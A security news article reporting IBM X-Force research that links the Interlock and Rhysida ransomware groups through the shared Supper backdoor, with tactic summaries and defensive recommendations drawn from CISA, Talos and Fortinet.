Interlock and Rhysida Ransomware Groups Linked by Shared Supper Backdoor

Interlock and Rhysida ransomware operations appear to share more technical overlap than previously known, according to new research from IBM X-Force. The strongest link is a backdoor called Supper, also known as SocksShell, which has appeared in activity tied to both ransomware ecosystems.

The IBM X-Force research found code similarities across Supper, NodeSnake, InterlockRAT, and JunkFiction downloader. IBM said the overlap suggests a shared original codebase or possible common developers, although the exact relationship between the groups remains unknown.

Interlock has operated since September 2024 and does not appear to run as a typical ransomware-as-a-service operation. Rhysida, by contrast, has been active since at least May 2023 and has been tracked as a ransomware-as-a-service group by government and security researchers.

What IBM Found

IBM’s report places Supper at the center of the connection. The backdoor was observed before NodeSnake and InterlockRAT and was originally found protected by JunkFiction, the same crypter used by Interlock on its own tools.

The overlap does not prove that the two ransomware brands are one operation. It does show that their tooling, crypters, and infection chains share important technical relationships that defenders should track together.

IBM also noted that Interlock and Rhysida each claimed around 80 victims in 2025, with most victims located in the United States. Healthcare, education, and government organizations were among the sectors affected by these operations.

Group	Known activity	Operating model	Tools and malware highlighted
Interlock	Observed since September 2024	Not clearly operated as RaaS	NodeSnake, InterlockRAT, JunkFiction, Supper, Interlock ransomware
Rhysida	Observed since at least May 2023	Ransomware-as-a-service	Supper, Broomstick, Endico downloader, Tomb crypter, Rhysida ransomware
Shared overlap	Seen across multiple incidents	Relationship unclear	Supper backdoor, similar code structures, related crypter use, overlapping malware behavior

Supper Backdoor Creates the Strongest Link

Supper is a remote access backdoor that can maintain persistence, create encrypted tunnels, and execute remote shell commands. IBM said its behavior closely mirrors capabilities found in InterlockRAT.

The analysis of Supper and related malware found nearly identical command structures, similar control-server registration formats, and the same self-deletion method across some samples.

That self-deletion technique is especially notable. IBM found that an embedded DLL used by older Supper versions to delete itself from disk also appeared inside the Interlock ransomware binary.

Earlier Research Already Pointed to a Rhysida Connection

Cisco Talos previously linked Interlock to Rhysida with low confidence. In its Interlock ransomware analysis, Talos said Interlock may have emerged from Rhysida operators or developers based on similarities in tactics, tools, procedures, and ransomware binaries.

Talos also found overlaps in file and folder exclusion logic, shared use of tools such as AnyDesk and PuTTY, and the use of AzCopy for data exfiltration. These findings did not prove common ownership, but they supported the idea that the two operations sit close together in the ransomware ecosystem.

The latest IBM research adds more technical depth to that earlier assessment by connecting Supper, NodeSnake, InterlockRAT, and JunkFiction through code-level similarities.

How Interlock Infections Usually Start

Interlock attacks often rely on social engineering, fake browser updates, malicious software installers, and ClickFix-style prompts that trick users into running commands. The joint CISA Interlock advisory says the group uses double extortion by exfiltrating data before encrypting systems.

Interlock has also used custom and commodity tools for reconnaissance, credential theft, lateral movement, and remote access. CISA said the group has targeted businesses and critical infrastructure in North America and Europe.

Fortinet’s incident response team also observed Interlock adapting its toolset over time. In a FortiGuard Labs analysis, researchers described Interlock as a smaller, dedicated operation that develops much of its own malware instead of relying entirely on affiliate tooling.

Rhysida Remains a Major Ransomware Threat

Rhysida has been active longer than Interlock and has targeted several high-impact sectors. The CISA Rhysida advisory says the group has focused on education, healthcare, manufacturing, information technology, and government organizations.

Rhysida operators have used external-facing remote services, valid accounts, phishing, and other access methods to compromise networks. Once inside, they typically conduct discovery, steal data, and deploy ransomware to pressure victims through extortion.

IBM’s report connects some Rhysida-linked activity to Vanilla Tempest, a Microsoft-tracked threat cluster that has used Supper in ransomware intrusion chains. That gives defenders another reason to search for Supper-related activity even if the final ransomware payload has not yet appeared.

Why Shared Malware Matters for Defenders

Ransomware groups often change names, affiliates, loaders, and infrastructure. Shared malware gives defenders a more durable way to connect activity across campaigns.

When a backdoor like Supper appears in multiple ransomware ecosystems, security teams should treat it as an early warning sign. The same is true for related crypters, downloaders, staging servers, and recurring post-compromise tools.

The Cisco Talos findings and the newer IBM report both point in the same direction: Interlock and Rhysida may be separate brands, but their tooling and development history overlap enough to matter in threat hunting.

Common Tactics and Tools to Watch

• Trojanized installers for popular software such as Microsoft Teams
• Fake browser update pages and ClickFix-style prompts
• JunkFiction downloader and crypter activity
• NodeSnake and InterlockRAT payloads
• Supper or SocksShell backdoor activity
• Use of AzCopy for data exfiltration
• Use of Advanced Port Scanner, AnyDesk, PuTTY, and similar administrative tools
• Unexpected Windows Defender Application Control policy changes
• Suspicious signed executables from unfamiliar publishers

Interlock’s behavior also highlights a wider trend. Ransomware operators increasingly mix custom malware with legitimate administrative tools, signed binaries, and traffic distribution systems that make early detection harder.

The Interlock guidance from CISA recommends defenses such as multifactor authentication, network segmentation, offline backups, patching, and detection for suspicious remote access tools.

What Organizations Should Do Now

Security teams should hunt for Supper, NodeSnake, InterlockRAT, and JunkFiction indicators together rather than treating them as isolated malware families. They should also review logs for fake update infection chains, ClickFix prompts, abnormal PowerShell execution, and unusual use of remote management tools.

The Fortinet research also shows why regular threat hunting matters. Interlock intrusions can include multiple stages, changing payloads, and long dwell time before final ransomware deployment.

For Rhysida-related defense, the Rhysida advisory from CISA recommends maintaining offline backups, restricting remote access, enforcing phishing-resistant MFA, segmenting networks, and monitoring for suspicious use of valid accounts.

The main takeaway is simple: Interlock and Rhysida may not be the same operation, but defenders should connect their telemetry. Supper-related activity, shared crypter behavior, and overlapping infection patterns can give organizations earlier warning before ransomware deployment.

FAQ